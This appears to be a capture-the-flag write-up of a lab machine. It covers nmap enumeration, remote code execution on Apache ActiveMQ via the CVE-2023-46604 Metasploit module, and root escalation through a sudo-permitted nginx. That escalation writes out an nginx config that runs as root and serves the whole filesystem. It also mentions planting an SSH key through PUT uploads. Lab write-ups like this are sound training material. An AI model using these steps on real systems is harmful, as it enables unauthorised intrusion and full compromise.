Enumeration
nmap the target machine.
...
9999/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Index of /
| http-ls: Volume /
| maxfiles limit reached (10)
| SIZE TIME FILENAME
| - 06-Nov-2023 01:10 bin/
| - 06-Nov-2023 01:10 bin/X11/
| 963 17-Feb-2020 14:11 bin/NF
| 129576 27-Oct-2023 11:38 bin/VGAuthService
| 51632 07-Feb-2022 16:03 bin/%5B
| 35344 19-Oct-2022 14:52 bin/aa-enabled
| 35344 19-Oct-2022 14:52 bin/aa-exec
| 31248 19-Oct-2022 14:52 bin/aa-features-abi
| 14478 04-May-2023 11:14 bin/add-apt-repository
| 14712 21-Feb-2022 01:49 bin/addpart
|_
44391/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_ java.lang.Thread.run(Thread.java:750)
61614/tcp open http Jetty 9.4.39.v20210325
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open apachemq ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15
...
The result shows me the keyword activemq.
I googled activemq exploit.
I found it has the vulnerability CVE-2023-46604 and the default port is 61616.
Also, I found that it is on metasploit.
So I chose metasploit instead of using the github source code.
user flag
msfconsole search activemq
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/apache_activemq_upload_jsp 2016-06-01 excellent No ActiveMQ web shell upload
1 exploit/windows/http/apache_activemq_traversal_upload 2015-08-19 excellent Yes Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload
2 auxiliary/scanner/http/apache_activemq_traversal normal No Apache ActiveMQ Directory Traversal
3 auxiliary/scanner/http/apache_activemq_source_disclosure normal No Apache ActiveMQ JSP Files Source Disclosure
4 exploit/multi/misc/apache_activemq_rce_cve_2023_46604 2023-10-27 excellent Yes Apache ActiveMQ Unauthenticated Remote Code Execution
5 exploit/windows/browser/samsung_security_manager_put 2016-08-05 excellent No Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution
That’s the one I found. Use 4 and input the required parameters. Then we get the shell.
whoami
activemq
The user flag is in the home directory.
root flag
To get the root’s privilege, I checked the sudo command.
sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
Ok, we can use nginx with sudo meaning we can access the configuration file.
cat /etc/nginx/nginx.conf | grep -v "#"
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
}
http {
sendfile on;
tcp_nopush on;
types_hash_max_size 2048;
include /etc/nginx/mime.types;
default_type application/octet-stream;
ssl_prefer_server_ciphers on;
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
gzip on;
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
We are going to modify this file to get the root privilege.
I modified the file as below and then saved it to activemq’s home directory.
user root;
worker_processes auto;
pid /run/nginx2.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
}
http {
server {
listen 9999;
location / {
root /;
autoindex on;
}
}
}
Basically, I changed the user to root and set the root location to ‘/’.
Then we can set this modified config file to live.
nginx -c /home/activemq/nginx.config
Then we can curl it if it’s working fine.
curl localhost:9999
...
<a href="root/">root/</a> 15-Apr-2024 00:56 -
<a href="run/">run/</a> 15-Apr-2024 05:24 -
<a href="sbin/">sbin/</a> 06-Nov-2023 01:10 -
<a href="srv/">srv/</a> 06-Nov-2023 01:18 -
<a href="sys/">sys/</a> 15-Apr-2024 00:55 -
<a href="tmp/">tmp/</a> 15-Apr-2024 05:15 -
<a href="usr/">usr/</a> 17-Feb-2023 17:19 -
<a href="var/">var/</a> 05-Nov-2023 01:43 -
</pre><hr></body>
</html>
Ok, I can see some outputs.
Now we can directly access the root directory as we set up in the modified config file.
curl localhost:9999/root/root.txt
Then we will get the root flag.
In the official write-up, they modified the config file to allow PUT method to upload files.
Then, they generate an ssh public key and upload it to the root’s authorized keys directory.
By doing that, you can log in as a root using the created public key.
However, I didn’t do that since I could get the flag without logging in as root.